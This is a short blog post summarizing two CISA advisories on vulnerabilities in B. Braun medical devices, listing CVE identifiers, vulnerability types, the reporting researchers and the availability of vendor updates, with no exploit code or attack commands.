Today the CISA NCCIC-ICS published two medical device
security advisories for products from B. Braun Melsungen AG.

SpaceCom Advisory X

This advisory describes
eleven vulnerabilities in the B. Braun SpaceCom, Battery Pack SP with Wi-Fi,
and Data module compactplus products. The vulnerabilities were reported by Julian
Suleder, Nils Emmerich, and Birk Kauer of ERNW Research, and Dr. Oliver Matula
of ERNW Enno Rey Netzwerke via the German Federal Office for Information
Security (BSI). B. Braun has updates that mitigate the vulnerabilities. There
is no indication that the researchers have been provided an opportunity to
verify the efficacy of the fix.

The eleven reported vulnerabilities are:

• Cross-site scripting – CVE-2020-25158,

• Open redirect – CVE-2020-25154,

• XPath injection – CVE-2020-25162,

• Session fixation – CVE-2020-25152,

• Use of one-way hash without a salt
– CVE-2020-25164,

• Relative path traversal – CVE-2020-25150,

• Improper verification of
cryptographic signature – CVE-2020-25166,

• Improper privilege management – CVE-2020-16238,

• Use of hard-coded credentials – CVE-2020-25168,

• Active debug code – CVE-2020-25156,
and

• Improper access control – CVE-2020-25160

NCCIC-ICS reports that a relatively low-skilled attacker
could remotely exploit these vulnerabilities to allow an attacker to compromise
the security of the Space or compactplus communication devices, allowing an
attacker to escalate privileges, view sensitive information, upload arbitrary
files, and perform remote code execution.

OnlineSuite Advisory

This advisory
describes three vulnerabilities in the B. Braun OnlineSuite product. The
vulnerabilities were reported by the same researchers mentioned in the first
advisory. B. Braun has an update that mitigates the vulnerabilities. There is
no indication that the researchers have been provided an opportunity to verify
the efficacy of the fix.

The three reported vulnerabilities are:

• Relative path traversal – CVE-2020-25172,

• Uncontrolled search path element
– CVE-2020-25174,

• Improper neutralization of
formula elements in a CSV file – CVE-2020-25170

NCCIC-ICS reports that a relatively low-skilled attacker
could remotely exploit the vulnerabilities to allow an attacker to escalate
privileges, download and upload arbitrary files, and perform remote code
execution.

NOTE: Neither of the company advisories are listed on the US
web site
for B. Braun.

By admin